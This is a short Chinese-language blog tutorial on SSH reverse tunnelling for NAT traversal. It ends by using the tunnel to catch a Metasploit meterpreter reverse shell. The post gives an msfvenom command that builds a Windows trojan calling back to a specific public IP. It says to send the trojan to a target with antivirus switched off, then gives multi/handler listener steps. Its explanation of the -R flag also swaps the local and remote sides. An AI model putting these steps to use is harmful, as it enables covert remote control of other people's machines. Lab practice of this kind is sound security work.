SSH反向代理实现内网穿透
SSH反向代理实现内网穿透

SSH反向代理实现内网穿透

ssh -R 0.0.0.0:7777:127.0.0.1:7777 -fN username@ip

命令是用于通过SSH协议创建一个反向隧道的命令。这个命令的组成部分如下:

  1. ssh:SSH客户端的命令,用于建立安全连接。
  2. -R [bind_address:]port:host:hostport:这个选项用于设置远程端口转发。在您提供的命令中,它被用来创建一个反向隧道。
  3. 0.0.0.0:7777:这是本地机器上要监听的IP地址和端口。0.0.0.0表示监听所有可用的网络接口上的7777端口。
  4. 127.0.0.1:7777:这是远程机器上要转发到的IP地址和端口。127.0.0.1是本地回环地址,表示流量将被转发到远程机器的本地。
  5. -f:这个选项告诉ssh在启动连接后在后台运行。
  6. -N:表示不执行远程命令,仅建立隧道。
  7. username:这是远程服务器上的用户名。
  8. ip:这是远程服务器的IP地址。

使用这个命令,您可以将远程服务器上的7777端口通过SSH隧道转发到本地机器的7777端口。这在需要从本地机器访问远程服务器上的特定服务,而该服务在远程服务器上没有对外部网络开放时非常有用。

ps -aux|grep "ssh" // 查看ssh反向代理是否开启成功

这样访问公网IP:7777端口时就会转发到你本地的7777端口

开启临时php服务测试是否可以在公网访问到本地7777端口

php -S 0:7777 // 开启临时php服务

访问后出现php页面

而且本地监听中有回显,说明公网访问的php服务就是本地部署的临时php服务

尝试使用msfvenom生成木马测试远控程序是否可以用这种方式监听到

msfvenom -p windows/meterpreter/reverse_tcp lhost=218.244.156.94 lport=7777 -f exe -o shell.exe // 生成exe木马

发送给靶机(记得关闭杀毒软件和Windows自带的反病毒系统)

msfconsole // 开启msf控制台

use exploit/multi/handler // 使用监听模块

show options // 查看需要配置的选项

set [key] [value] // 设置配置选项(记得配置payload)

点击后成功监听到反弹shell

成功执行命令

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注